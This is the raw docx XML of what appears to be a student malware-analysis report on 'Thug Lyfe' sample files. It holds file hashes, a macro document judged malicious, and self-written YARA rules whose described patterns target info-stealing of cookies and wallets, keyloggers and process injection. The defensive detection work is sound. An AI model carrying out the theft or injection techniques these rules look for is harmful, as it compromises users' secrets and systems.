      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">three were determined to be suspicious.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The key findings of the analysis can be found below. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zhdhj036ykf8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>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Suspicious Files Identified</w:t>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04F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Image_downloader.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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SecurityAdvisory.docm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Frontpage.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>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Benign Files Identified: </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53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Fileview.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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Volt.wav</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>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Primary Threat: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecurityAdvisory.docm (confirmed malicious macro document) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Yara Rules Triggered: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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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detectHTTP.yar, HighEntropy.yar, SuspisiousDLLSection.yar, SuspisiousEXESectionCount.yar, SuspiciousSYSSection.yar, JPEG_Filetype.yar, JPG_Filetype.yar, Malicious_Office_AutoOpen_Macro.yar, HighEntropyAny.yar, and thugLyfe2.yar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:before="280" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0b5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9sh51w6sjsh9" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0b5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files Analyzed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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is the table containing information on the five Thug Lyfe files analyzed. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>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685"/>
        <w:gridCol w:w="1155"/>
        <w:gridCol w:w="2955"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2475"/>
            <w:gridCol w:w="2685"/>
            <w:gridCol w:w="1155"/>
            <w:gridCol w:w="29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Size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Entropy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ImpHash</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fileview.exe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203 KB (208,072 bytes)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6.3015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line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3b0b72c4f91d37761e671660f0cc71ef</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frontpage.jpg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39.8 KB (40,763 bytes)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image_downloader.exe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41.5 KB (42,496 bytes)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5.8887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line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2b118d31d9bec7be21e00405ba5c2b15</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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SecurityAdvisor.doom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16.5 KB (16,971 bytes)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volt.wav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67.7 KB (69,422 bytes)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bl>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pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:before="280" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0b5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5qrl70hvnr7s" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0b5394"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below is the table containing the MD5 and SHA256 hashes of the five Thug Lyfe files analyzed. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>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3405"/>
        <w:gridCol w:w="3990"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1890"/>
            <w:gridCol w:w="3405"/>
            <w:gridCol w:w="399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MD5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Sha256</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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fileview.exe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7fd126c4884e6d837e2ba80208163cfe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bfb1a374772cccc06440ee3def14d6556d3b51c9e6de95b69917798b235e733b</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frontpage.jpg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6a2366799b5474a70e782666fb074e9f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4e24eaca0183c81d776dbcf5b35afd601f536f127565e20780d71a3bab3e0170</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image_downloader.exe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5207fe630502c3ff2515dd49683c9b2e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e84471e37e726fc614a8044e83cb97e4a78ef5b7cc5ce8b5de440ae724ecb910</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SecurityAdvisor.docm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92910b8ec24ace49e3a6eecf3670ff57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7183fbf556628a122f3e51c62034dcc428a79586f1f7eb7c94600968ca2eb66a</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volt.wav</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82033e678d6ee95e9486e94c60fa3ea9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9deabc71f3d9003d933a529841b4b80d97983d2a460e1fa7c5588649066595b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q2maxosupki1" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p526gu3xk1ph" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supplemental Document References</w:t>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includes external document(s) related to this report that may be beneficial to those reviewing the analysis results.  This document includes self-created Yara scripts for the purpose of locating suspicious files on a device with Yara installed.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wshceb7z2wv7" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Yara Rules</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Almost all rules can be found at “</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/savannahc502/collaborative_yara_rules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These rules are separated into categories to simplify organization and help with legibility. </w:t>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of the new rules created after analyzing the ThugLyfe campaign files can be found instead at “</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/louismattiolo/23c7dd95c4026c712f5b1ae4832b606b#file-exif_base64_powershell_command-yara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pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8uk9t7xhzpgd" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copilot Formatting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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part of the previous assignment, “</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Group 1 Submission: Searching for a Thug</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,” a supplemental document titled “</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LLM Formatting Supplement: Search for a Thug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was created. This document includes the original prompt submitted to Copilot, the AI-generated output, and a brief explanation of how the formatting was adapted to meet the assignment’s requirements. Although this current paper was not formally submitted to Copilot due to character limitations, the same formatting approach was used to guide its structure and tone. The supplemental document serves as a reference for the professional styling applied throughout this report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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36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6">
      <w:pPr>
        <w:spacing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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f8qz3xkqw9qm" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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content in this section will encompass both the environment itself and tool applications. This section will also give explanations for each of the YARA rules that have been used for this analysis, which can be found on </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Savannah Ciak’s GitHub page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9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c1rlwbqu8g4i" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysis Environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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specifics of what the digital environment looks like for the analysis. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Enterprise Evaluation (Build 17763.1935)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>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Ubuntu 22.04.5 [release: 22.04]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Tools: YARA (4.5.4), Browmal, Sigcheck, PowerShell, VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_atz8zds9wvqd" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA Rule Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Below are each of the YARA rules the group created and used for this analysis, and their specific usages/use cases. This will include the reasoning behind its use in this analysis. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7bvqpj78t536" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious Techniques</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="9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6345"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3225"/>
            <w:gridCol w:w="6345"/>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Rule Name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Purpose</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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4">
            <w:pPr>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color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">FileOperations.yar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suspicious system commands, like DeleteFile and CopyFile, which should only be run by known and verified system files.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6">
            <w:pPr>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1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">InfoStealer.yar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Flags references to browser data, cookies, and wallet information</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8">
            <w:pPr>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PersistenceScan.yar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startup scripts using CreateService or StartService</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A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId21">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousAPIcalls.yar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Flags files with 3+ suspicious API calls like “CreateRemoteThread”, “WriteProcessMemory”, “VirtualAllocEx”, “OpenProcess,” etc. </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C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId22">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">UnusualNumOfExports.yar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Flags files with 6–9 exports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AE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Keylogger.yar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WindowsHooks, AsyncKeyStates, and keyboard functions before looking for the name “keylog” or log.txt.</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0">
            <w:pPr>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color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Malicious_Office_AutoOpen_Macro.yar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Office documents with VBA macros</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wj2e5apekwf2" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Sections</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="9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6330"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3240"/>
            <w:gridCol w:w="6330"/>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Rule Name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Purpose</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId25">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousDLLSections.yar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Flags DLLs with &lt;6 or &gt;8 sections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7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId26">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousEXESectionCount.yar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Flags EXEs with &lt;6 or &gt;8 sections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9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId27">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousMUISection.yar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Flags MUI files with &lt;2 sections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B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">SuspiciousSYSSections.yar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Flags SYS files with &lt;9 or &gt;13 sections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D">
            <w:pPr>
              <w:rPr>
